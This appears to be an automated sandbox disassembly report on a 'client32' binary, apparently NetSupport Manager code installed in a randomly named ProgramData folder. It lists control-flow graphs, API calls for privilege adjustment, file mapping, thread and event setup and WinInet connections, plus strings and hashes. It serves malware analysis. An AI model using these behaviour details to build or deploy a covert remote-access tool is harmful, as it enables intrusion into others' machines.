                                                                                                                                                                                control_flow_graph 667 1109e5b0-1109e612 call 1109dda0 670 1109e618-1109e63b call 1109d860 667->670 671 1109ec30 667->671 676 1109e641-1109e655 LocalAlloc 670->676 677 1109e7a4-1109e7a6 670->677 673 1109ec32-1109ec4d call 11162bb7 671->673 679 1109e65b-1109e68d InitializeSecurityDescriptor SetSecurityDescriptorDacl GetVersionExA 676->679 680 1109ec25-1109ec2b call 1109d8f0 676->680 681 1109e736-1109e75b CreateFileMappingA 677->681 684 1109e71a-1109e730 679->684 685 1109e693-1109e6be call 1109d7d0 call 1109d810 679->685 680->671 682 1109e7a8-1109e7bb GetLastError 681->682 683 1109e75d-1109e77d GetLastError call 110d6c20 681->683 689 1109e7bd 682->689 690 1109e7c2-1109e7d9 MapViewOfFile 682->690 695 1109e788-1109e790 683->695 696 1109e77f-1109e786 LocalFree 683->696 684->681 713 1109e709-1109e711 685->713 714 1109e6c0-1109e6f6 GetSecurityDescriptorSacl 685->714 689->690 693 1109e7db-1109e7f6 call 110d6c20 690->693 694 1109e817-1109e81f 690->694 716 1109e7f8-1109e7f9 LocalFree 693->716 717 1109e7fb-1109e803 693->717 697 1109e8c1-1109e8d3 694->697 698 1109e825-1109e83e GetModuleFileNameA 694->698 705 1109e792-1109e793 LocalFree 695->705 706 1109e795-1109e79f 695->706 696->695 701 1109e919-1109e932 call 11162be0 GetTickCount 697->701 702 1109e8d5-1109e8d8 697->702 703 1109e8dd-1109e8f8 call 110d6c20 698->703 704 1109e844-1109e84d 698->704 728 1109e934-1109e939 701->728 709 1109e9bf-1109ea23 GetCurrentProcessId GetModuleFileNameA call 1109dc30 702->709 732 1109e8fa-1109e8fb LocalFree 703->732 733 1109e8fd-1109e905 703->733 704->703 710 1109e853-1109e856 704->710 705->706 712 1109ec1e-1109ec20 call 1109dce0 706->712 737 1109ea2b-1109ea42 CreateEventA 709->737 738 1109ea25 709->738 721 1109e899-1109e8bc call 110d6c20 call 1109dce0 710->721 722 1109e858-1109e85c 710->722 712->680 713->684 726 1109e713-1109e714 FreeLibrary 713->726 714->713 725 1109e6f8-1109e703 SetSecurityDescriptorSacl 714->725 716->717 718 1109e808-1109e812 717->718 719 1109e805-1109e806 LocalFree 717->719 718->712 719->718 721->697 722->721 731 1109e85e-1109e869 722->731 725->713 726->684 734 1109e93b-1109e94a 728->734 735 1109e94c 728->735 739 1109e870-1109e874 731->739 732->733 740 1109e90a-1109e914 733->740 741 1109e907-1109e908 LocalFree 733->741 734->728 734->735 742 1109e94e-1109e954 735->742 746 1109ea44-1109ea63 GetLastError * 2 call 110d6c20 737->746 747 1109ea66-1109ea6e 737->747 738->737 744 1109e890-1109e892 739->744 745 1109e876-1109e878 739->745 740->712 741->740 748 1109e965-1109e9bd 742->748 749 1109e956-1109e963 742->749 753 1109e895-1109e897 744->753 750 1109e87a-1109e880 745->750 751 1109e88c-1109e88e 745->751 746->747 754 1109ea70 747->754 755 1109ea76-1109ea87 CreateEventA 747->755 748->709 749->742 749->748 750->744 758 1109e882-1109e88a 750->758 751->753 753->703 753->721 754->755 756 1109ea89-1109eaa8 GetLastError * 2 call 110d6c20 755->756 757 1109eaab-1109eab3 755->757 756->757 761 1109eabb-1109eacd CreateEventA 757->761 762 1109eab5 757->762 758->739 758->751 764 1109eacf-1109eaee GetLastError * 2 call 110d6c20 761->764 765 1109eaf1-1109eaf9 761->765 762->761 764->765 767 1109eafb 765->767 768 1109eb01-1109eb12 CreateEventA 765->768 767->768 770 1109eb34-1109eb42 768->770 771 1109eb14-1109eb31 GetLastError * 2 call 110d6c20 768->771 772 1109eb44-1109eb45 LocalFree 770->772 773 1109eb47-1109eb4f 770->773 771->770 772->773 775 1109eb51-1109eb52 LocalFree 773->775 776 1109eb54-1109eb5d 773->776 775->776 778 1109eb63-1109eb66 776->778 779 1109ec07-1109ec19 call 110d6c20 776->779 778->779 781 1109eb6c-1109eb6f 778->781 779->712 781->779 783 1109eb75-1109eb78 781->783 783->779 784 1109eb7e-1109eb81 783->784 785 1109eb8c-1109eba8 CreateThread 784->785 786 1109eb83-1109eb89 GetCurrentThreadId 784->786 787 1109ebaa-1109ebb4 785->787 788 1109ebb6-1109ebc0 785->788 786->785 787->712 789 1109ebda-1109ec05 SetEvent call 110d6c20 call 1109d8f0 788->789 790 1109ebc2-1109ebd8 ResetEvent * 3 788->790 789->673 790->789
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 1109D860: GetCurrentProcess.KERNEL32(000F01FF,?,11030703,00000000,00000000,00080000,2520CF5D,00080000,00000000,?), ref: 1109D88D
                                                                                                                                                                                  • Part of subcall function 1109D860: OpenProcessToken.ADVAPI32(00000000), ref: 1109D894
                                                                                                                                                                                  • Part of subcall function 1109D860: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D8A5
                                                                                                                                                                                  • Part of subcall function 1109D860: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D8C9
                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,2520CF5D,00080000,00000000,?), ref: 1109E645
                                                                                                                                                                                • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109E65E
                                                                                                                                                                                • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 1109E669
                                                                                                                                                                                • GetVersionExA.KERNEL32(?), ref: 1109E680
                                                                                                                                                                                • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E6EE
                                                                                                                                                                                • SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 1109E703
                                                                                                                                                                                • FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E714
                                                                                                                                                                                • CreateFileMappingA.KERNEL32(000000FF,11030703,00000004,00000000,?,?), ref: 1109E750
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 1109E75D
                                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 1109E786
                                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 1109E793
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 1109E7B0
                                                                                                                                                                                • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 1109E7CE
                                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 1109E7F9
                                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 1109E806
                                                                                                                                                                                  • Part of subcall function 1109D7D0: LoadLibraryA.KERNEL32(Advapi32.dll,00000000,1109E69E), ref: 1109D7D8
                                                                                                                                                                                  • Part of subcall function 1109D810: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109D824
                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E832
                                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 1109E8FB
                                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 1109E908
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1109E928
                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 1109E9D4
                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E9EF
                                                                                                                                                                                • CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109EA3B
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 1109EA44
                                                                                                                                                                                • GetLastError.KERNEL32(00000000), ref: 1109EA4B
                                                                                                                                                                                • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109EA80
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 1109EA89
                                                                                                                                                                                • GetLastError.KERNEL32(00000000), ref: 1109EA90
                                                                                                                                                                                • CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 1109EAC6
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 1109EACF
                                                                                                                                                                                • GetLastError.KERNEL32(00000000), ref: 1109EAD6
                                                                                                                                                                                • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109EB0B
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 1109EB1A
                                                                                                                                                                                • GetLastError.KERNEL32(00000000), ref: 1109EB1D
                                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 1109EB45
                                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 1109EB52
                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 1109EB83
                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00002000,Function_0009E140,00000000,00000000,00000030), ref: 1109EB9D
                                                                                                                                                                                • ResetEvent.KERNEL32(?), ref: 1109EBCC
                                                                                                                                                                                • ResetEvent.KERNEL32(?), ref: 1109EBD2
                                                                                                                                                                                • ResetEvent.KERNEL32(?), ref: 1109EBD8
                                                                                                                                                                                • SetEvent.KERNEL32(?), ref: 1109EBDE
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView
                                                                                                                                                                                • String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists
                                                                                                                                                                                • API String ID: 4267466239-2792520954
                                                                                                                                                                                • Opcode ID: 9b2b1a02cbe97b144b781028a0efb8148361c019b2002780c3d7ead556191dcf
                                                                                                                                                                                • Instruction ID: a3fd055aacadca8d823d44ca49761fd5d24e706f53ed4dbc48f97bf713fa71f6
                                                                                                                                                                                • Opcode Fuzzy Hash: 9b2b1a02cbe97b144b781028a0efb8148361c019b2002780c3d7ead556191dcf
                                                                                                                                                                                • Instruction Fuzzy Hash: A612B2B5E0026D9FEB24DF60CDD4EAAB7BAFB88304F0049A9E51D97640D671AD84CF50
                                                                                                                                                                                Function 6C617030 Relevance: 89.7, APIs: 21, Strings: 30, Instructions: 406threadlibrarysynchronizationCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 795 6c617030-6c617050 call 6c602a90 call 6c61dbd0 800 6c617052-6c617095 LoadLibraryA 795->800 801 6c617097 795->801 802 6c617099-6c6170f8 call 6c608d00 InitializeCriticalSection CreateEventA 800->802 801->802 805 6c617111-6c61711e CreateEventA 802->805 806 6c6170fa-6c61710e call 6c606f50 802->806 807 6c617120-6c617134 call 6c606f50 805->807 808 6c617137-6c617144 CreateEventA 805->808 806->805 807->808 811 6c617146-6c61715a call 6c606f50 808->811 812 6c61715d-6c617170 WSAStartup 808->812 811->812 816 6c617183-6c6171b2 call 6c621b69 812->816 817 6c617172-6c617182 call 6c605290 call 6c602b70 812->817 823 6c6171d0-6c6171e4 call 6c621c50 816->823 824 6c6171b4-6c6171cd call 6c606f50 816->824 831 6c6171e6-6c6171e9 823->831 832 6c6171fa-6c617202 823->832 824->823 831->832 833 6c6171eb-6c6171f1 831->833 834 6c617204 832->834 835 6c617209-6c617223 call 6c623753 832->835 833->832 836 6c6171f3-6c6171f8 833->836 834->835 839 6c617225-6c617239 call 6c606f50 835->839 840 6c61723c-6c617255 call 6c619bf0 835->840 836->835 839->840 845 6c617257-6c61725e 840->845 846 6c61726a-6c617271 call 6c605730 840->846 847 6c617260-6c617268 845->847 850 6c617277-6c61729a call 6c621b69 846->850 851 6c61730b-6c617310 846->851 847->846 847->847 859 6c61729c-6c6172bb call 6c606f50 850->859 860 6c6172be-6c6172dc call 6c621c50 call 6c621b69 850->860 852 6c617312-6c617315 851->852 853 6c61731e-6c617336 call 6c605e90 call 6c605530 851->853 852->853 856 6c617317-6c61731c 852->856 858 6c617339-6c617354 call 6c605e90 853->858 856->853 856->858 871 6c617361-6c61738b GetTickCount CreateThread 858->871 872 6c617356-6c61735c 858->872 859->860 876 6c6172fa-6c617308 call 6c621c50 860->876 877 6c6172de-6c6172f7 call 6c606f50 860->877 874 6c6173a9-6c6173b6 SetThreadPriority 871->874 875 6c61738d-6c6173a6 call 6c606f50 871->875 872->871 879 6c6173b8-6c6173cc call 6c606f50 874->879 880 6c6173cf-6c6173ed call 6c605f20 call 6c605e90 874->880 875->874 876->851 877->876 879->880 892 6c6173f5-6c6173f7 880->892 893 6c6173ef 880->893 894 6c617425-6c617447 GetModuleFileNameA call 6c602420 892->894 895 6c6173f9-6c617407 call 6c61dbd0 892->895 893->892 900 6c617449-6c61744a 894->900 901 6c61744c 894->901 902 6c617409-6c61741c call 6c604580 895->902 903 6c61741e 895->903 904 6c617451-6c61746d 900->904 901->904 906 6c617420 902->906 903->906 907 6c617470-6c61747f 904->907 906->894 907->907 909 6c617481-6c617486 907->909 910 6c617487-6c61748d 909->910 910->910 911 6c61748f-6c6174c8 GetPrivateProfileIntA GetModuleHandleA 910->911 912 6c617563-6c61758f CreateMutexA timeBeginPeriod 911->912 913 6c6174ce-6c6174fa call 6c605e90 * 2 911->913 918 6c617536-6c61755d call 6c605e90 * 2 913->918 919 6c6174fc-6c617511 call 6c605e90 913->919 918->912 925 6c617513-6c617528 call 6c605e90 919->925 926 6c61752a-6c617530 919->926 925->918 925->926 926->918
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 6C602A90: GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 6C602ACB
                                                                                                                                                                                  • Part of subcall function 6C602A90: _strrchr.LIBCMT ref: 6C602ADA
                                                                                                                                                                                  • Part of subcall function 6C602A90: _strrchr.LIBCMT ref: 6C602AEA
                                                                                                                                                                                  • Part of subcall function 6C602A90: wsprintfA.USER32 ref: 6C602B05
                                                                                                                                                                                  • Part of subcall function 6C61DBD0: _malloc.LIBCMT ref: 6C61DBE9
                                                                                                                                                                                  • Part of subcall function 6C61DBD0: wsprintfA.USER32 ref: 6C61DC04
                                                                                                                                                                                  • Part of subcall function 6C61DBD0: _memset.LIBCMT ref: 6C61DC27
                                                                                                                                                                                • LoadLibraryA.KERNEL32(WinInet.dll), ref: 6C617057
                                                                                                                                                                                • InitializeCriticalSection.KERNEL32(6C64B898), ref: 6C6170DF
                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6C6170EF
                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6C617115
                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6C61713B
                                                                                                                                                                                • WSAStartup.WSOCK32(00000101,6C64B91A), ref: 6C617167
                                                                                                                                                                                • _malloc.LIBCMT ref: 6C6171A3
                                                                                                                                                                                  • Part of subcall function 6C621B69: __FF_MSGBANNER.LIBCMT ref: 6C621B82
                                                                                                                                                                                  • Part of subcall function 6C621B69: __NMSG_WRITE.LIBCMT ref: 6C621B89
                                                                                                                                                                                  • Part of subcall function 6C621B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6C62D3C1,6C626E81,00000001,6C626E81,?,6C62F447,00000018,6C647738,0000000C,6C62F4D7), ref: 6C621BAE
                                                                                                                                                                                • _memset.LIBCMT ref: 6C6171D3
                                                                                                                                                                                • _calloc.LIBCMT ref: 6C617214
                                                                                                                                                                                • _malloc.LIBCMT ref: 6C61728B
                                                                                                                                                                                • _memset.LIBCMT ref: 6C6172C1
                                                                                                                                                                                • _malloc.LIBCMT ref: 6C6172CD
                                                                                                                                                                                • _memset.LIBCMT ref: 6C617303
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 6C617361
                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00004000,6C616BA0,00000000,00000000,6C64BACC), ref: 6C61737E
                                                                                                                                                                                • SetThreadPriority.KERNEL32(00000000,00000001), ref: 6C6173AC
                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\ProgramData\4dvs23l\Support\,00000104), ref: 6C617430
                                                                                                                                                                                • GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,mode,00000000,C:\ProgramData\4dvs23l\Support\pci.ini), ref: 6C6174B0
                                                                                                                                                                                • GetModuleHandleA.KERNEL32(nsmtrace), ref: 6C6174C0
                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 6C617566
                                                                                                                                                                                • timeBeginPeriod.WINMM(00000001), ref: 6C617573
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3007256676.000000006C601000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3007234393.000000006C600000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007315728.000000006C640000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007336466.000000006C649000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007443449.000000006C650000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_6c600000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Create$_malloc_memset$EventModule$FileNameThread_strrchrwsprintf$AllocateBeginCountCriticalHandleHeapInitializeLibraryLoadMutexPeriodPriorityPrivateProfileSectionStartupTick_calloctime
                                                                                                                                                                                • String ID: (iflags & CTL_REMOTE) == 0$*CMPI$*DisconnectTimeout$301389$C:\ProgramData\4dvs23l\Support\$C:\ProgramData\4dvs23l\Support\pci.ini$General$HTCTL32$NSM303008$NetworkSpeed$Support\$Trace$TraceFile$TraceRecv$TraceSend$WinInet.dll$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$htctl.packet_tracing$mode$nsmtrace$pci.ini$sv.ResumeEvent$sv.gateways$sv.hRecvThread$sv.hRecvThreadReadyEvent$sv.hResponseEvent$sv.s$sv.subset.omit$sv.subset.subset
                                                                                                                                                                                • API String ID: 3160247386-3042621690
                                                                                                                                                                                • Opcode ID: be1d702e869d2da8d6009dc17a1e52272ee52cabb9282c30b091b88f3a3d9b9d
                                                                                                                                                                                • Instruction ID: 34b4331ef8df65f7418ce30c92b24b439d46bf521302e873908bb758d0325905
                                                                                                                                                                                • Opcode Fuzzy Hash: be1d702e869d2da8d6009dc17a1e52272ee52cabb9282c30b091b88f3a3d9b9d
                                                                                                                                                                                • Instruction Fuzzy Hash: 3AD1D7B1A04214AFD710BF6ACCC495A7BB9EB0634DF14C929F949E7F41D63098888F9D
                                                                                                                                                                                Function 11029BB0 Relevance: 86.3, APIs: 37, Strings: 12, Instructions: 534libraryloadernetworkCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 930 11029bb0-11029c3e LoadLibraryA 931 11029c41-11029c46 930->931 932 11029c48-11029c4b 931->932 933 11029c4d-11029c50 931->933 934 11029c65-11029c6a 932->934 935 11029c52-11029c55 933->935 936 11029c57-11029c62 933->936 937 11029c99-11029ca5 934->937 938 11029c6c-11029c71 934->938 935->934 936->934 941 11029d4a-11029d4d 937->941 942 11029cab-11029cb7 call 11163a11 937->942 939 11029c73-11029c8a GetProcAddress 938->939 940 11029c8c-11029c8f InternetCloseHandle 938->940 939->940 946 11029c91-11029c93 SetLastError 939->946 940->937 944 11029d68-11029d80 InternetOpenA 941->944 945 11029d4f-11029d66 GetProcAddress 941->945 947 11029cbc-11029cc3 942->947 949 11029da4-11029db0 call 11163aa5 944->949 945->944 948 11029d99-11029da1 SetLastError 945->948 946->937 950 11029ce4-11029cf0 947->950 951 11029cc5-11029cde GetProcAddress 947->951 948->949 957 11029db6-11029de7 call 11142e60 call 11165250 949->957 958 1102a02a-1102a034 949->958 956 11029cf2-11029cfb GetLastError 950->956 959 11029d11-11029d13 950->959 951->950 953 11029d82-11029d8a SetLastError 951->953 953->956 956->959 960 11029cfd-11029d0f call 11163aa5 call 11163a11 956->960 981 11029de9-11029dec 957->981 982 11029def-11029e04 call 11081d30 * 2 957->982 958->931 962 1102a03a 958->962 964 11029d30-11029d3c 959->964 965 11029d15-11029d2e GetProcAddress 959->965 960->959 967 1102a04c-1102a04f 962->967 964->941 983 11029d3e-11029d47 964->983 965->964 971 11029d8f-11029d97 SetLastError 965->971 968 1102a051-1102a056 967->968 969 1102a05b-1102a05e 967->969 974 1102a1bf-1102a1c7 968->974 975 1102a060-1102a065 969->975 976 1102a06a 969->976 971->941 979 1102a1d0-1102a1e3 974->979 980 1102a1c9-1102a1ca FreeLibrary 974->980 984 1102a18f-1102a194 975->984 985 1102a06d-1102a075 976->985 980->979 981->982 1003 11029e06-11029e0a 982->1003 1004 11029e0d-11029e19 982->1004 983->941 990 1102a196-1102a1ad GetProcAddress 984->990 991 1102a1af-1102a1b5 984->991 988 1102a077-1102a08e GetProcAddress 985->988 989 1102a094-1102a09d 985->989 988->989 993 1102a14e-1102a150 SetLastError 988->993 997 1102a0a0-1102a0a2 989->997 990->991 994 1102a1b7-1102a1b9 SetLastError 990->994 991->974 995 1102a156-1102a15d 993->995 994->974 999 1102a16c-1102a18d call 11027f00 * 2 995->999 997->995 1001 1102a0a8-1102a0ad 997->1001 999->984 1001->999 1005 1102a0b3-1102a0ef call 11110230 call 11027eb0 1001->1005 1003->1004 1007 11029e44-11029e49 1004->1007 1008 11029e1b-11029e1d 1004->1008 1027 1102a101-1102a103 1005->1027 1028 1102a0f1-1102a0f4 1005->1028 1014 11029e4b-11029e5c GetProcAddress 1007->1014 1015 11029e5e-11029e75 InternetConnectA 1007->1015 1011 11029e34-11029e3a 1008->1011 1012 11029e1f-11029e32 GetProcAddress 1008->1012 1011->1007 1012->1011 1020 11029e3c-11029e3e SetLastError 1012->1020 1014->1015 1016 11029ea1-11029eac SetLastError 1014->1016 1017 1102a017-1102a027 call 11162777 1015->1017 1018 11029e7b-11029e7e 1015->1018 1016->1017 1017->958 1022 11029e80-11029e82 1018->1022 1023 11029eb9-11029ec1 1018->1023 1020->1007 1029 11029e84-11029e97 GetProcAddress 1022->1029 1030 11029e99-11029e9f 1022->1030 1031 11029ec3-11029ed7 GetProcAddress 1023->1031 1032 11029ed9-11029ef4 1023->1032 1035 1102a105 1027->1035 1036 1102a10c-1102a111 1027->1036 1028->1027 1034 1102a0f6-1102a0fa 1028->1034 1029->1030 1037 11029eb1-11029eb3 SetLastError 1029->1037 1030->1023 1031->1032 1038 11029ef6-11029efe SetLastError 1031->1038 1044 11029f01-11029f04 1032->1044 1034->1027 1039 1102a0fc 1034->1039 1035->1036 1040 1102a113-1102a129 call 110d12e0 1036->1040 1041 1102a12c-1102a12e 1036->1041 1037->1023 1038->1044 1039->1027 1040->1041 1048 1102a130-1102a132 1041->1048 1049 1102a134-1102a145 call 11162777 1041->1049 1045 1102a012-1102a015 1044->1045 1046 11029f0a-11029f0f 1044->1046 1045->1017 1052 1102a03c-1102a049 call 11162777 1045->1052 1050 11029f11-11029f28 GetProcAddress 1046->1050 1051 11029f2a-11029f36 1046->1051 1048->1049 1054 1102a15f-1102a169 call 11162777 1048->1054 1049->999 1063 1102a147-1102a149 1049->1063 1050->1051 1056 11029f38-11029f40 SetLastError 1050->1056 1062 11029f42-11029f5b GetLastError 1051->1062 1052->967 1054->999 1056->1062 1065 11029f76-11029f8b 1062->1065 1066 11029f5d-11029f74 GetProcAddress 1062->1066 1063->985 1069 11029f95-11029fa3 GetLastError 1065->1069 1066->1065 1067 11029f8d-11029f8f SetLastError 1066->1067 1067->1069 1070 11029fa5-11029faa 1069->1070 1071 11029fac-11029fb8 GetDesktopWindow 1069->1071 1070->1071 1072 1102a002-1102a007 1070->1072 1073 11029fd3-11029fef 1071->1073 1074 11029fba-11029fd1 GetProcAddress 1071->1074 1072->1045 1076 1102a009-1102a00f 1072->1076 1073->1045 1078 11029ff1 1073->1078 1074->1073 1075 11029ff6-1102a000 SetLastError 1074->1075 1075->1045 1076->1045 1078->1044
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryA.KERNEL32(WinInet.dll,2520CF5D,74DF23A0,?,00000000), ref: 11029BE5
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029C7F
                                                                                                                                                                                • InternetCloseHandle.WININET(000000FF), ref: 11029C8D
                                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 11029C93
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029CD1
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 11029CF2
                                                                                                                                                                                • _free.LIBCMT ref: 11029CFE
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029D21
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,InternetOpenA), ref: 11029D5B
                                                                                                                                                                                • InternetOpenA.WININET(11195264,?,?,000000FF,00000000), ref: 11029D7A
                                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 11029D84
                                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 11029D91
                                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 11029D9B
                                                                                                                                                                                • _free.LIBCMT ref: 11029DA5
                                                                                                                                                                                  • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                                                                                                                  • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029E25
                                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 11029E3E
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,InternetConnectA), ref: 11029E51
                                                                                                                                                                                • InternetConnectA.WININET(000000FF,1119A6C0,00000050,00000000,00000000,00000003,00000000,00000000), ref: 11029E6E
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029E8A
                                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 11029EA3
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 11029EC9
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 11029F1D
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 1102A083
                                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 1102A150
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102A1A2
                                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 1102A1B9
                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 1102A1CA
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
